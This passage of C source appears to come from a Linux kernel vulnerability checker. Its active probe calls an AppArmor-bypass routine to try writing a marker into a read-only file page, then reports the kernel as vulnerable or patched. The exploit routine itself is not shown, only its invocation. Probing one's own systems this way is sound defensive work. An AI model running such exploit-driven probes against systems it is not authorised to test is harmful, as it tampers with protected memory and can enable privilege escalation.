*/ int rfd = open(tmpl, O_RDONLY); if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } char tmp[4096]; if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) { close(rfd); unlink(tmpl); return DF_TEST_ERROR; } close(rfd); setenv("DIRTYFAIL_INNER_MODE", "esp-probe", 1); setenv("DIRTYFAIL_PROBE_SENTINEL", tmpl, 1); int rc = apparmor_bypass_fork_arm(0, NULL); unsetenv("DIRTYFAIL_INNER_MODE"); unsetenv("DIRTYFAIL_PROBE_SENTINEL"); if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; } if (rc != DF_EXPLOIT_OK) { log_bad("active-probe inner failed (exit=%d)", rc); unlink(tmpl); return DF_TEST_ERROR; } /* Re-read sentinel and search for marker. */ rfd = open(tmpl, O_RDONLY); if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } unsigned char after[64]; ssize_t got = read(rfd, after, sizeof(after)); close(rfd); unlink(tmpl); if (got <= 0) return DF_TEST_ERROR; for (int i = 0; i + 4 <= got; i++) { if (memcmp(after + i, MARKER, 4) == 0) { log_warn("ACTIVE PROBE: STORE landed at offset %d → kernel is VULNERABLE", i); return DF_VULNERABLE; } } log_ok("ACTIVE PROBE: page intact — kernel ESP path appears patched"); return DF_OK; }